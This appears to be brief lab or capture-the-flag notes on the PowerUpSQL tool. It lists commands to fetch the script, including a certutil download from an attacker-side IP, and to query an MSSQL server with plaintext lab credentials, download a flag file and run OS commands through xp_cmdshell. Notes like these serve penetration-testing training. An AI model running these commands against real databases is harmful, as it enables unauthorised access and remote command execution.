PowerUpSQL
Import
wget https://github.com/NetSPI/PowerUpSQL/raw/master/PowerUpSQL.ps1
certutil -urlcache -f http://10.10.14.84/PowerUpSQL.ps1 PowerUpSQL.ps1
Commands
Enumerating MSSQL Instances with PowerUpSQL
Executing query
Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'
Download File
Invoke-SQLDownloadFile -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -SourceFile "C:\Users\damundsen\Desktop\flag.txt" -OutputFile "C:\Users\damundsen\Desktop\flag.txt"
Execute OS commands: xp_cmdshell
Invoke-SQLOSCmd -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -Command "Whoami" -Threads 10
GitHub
https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet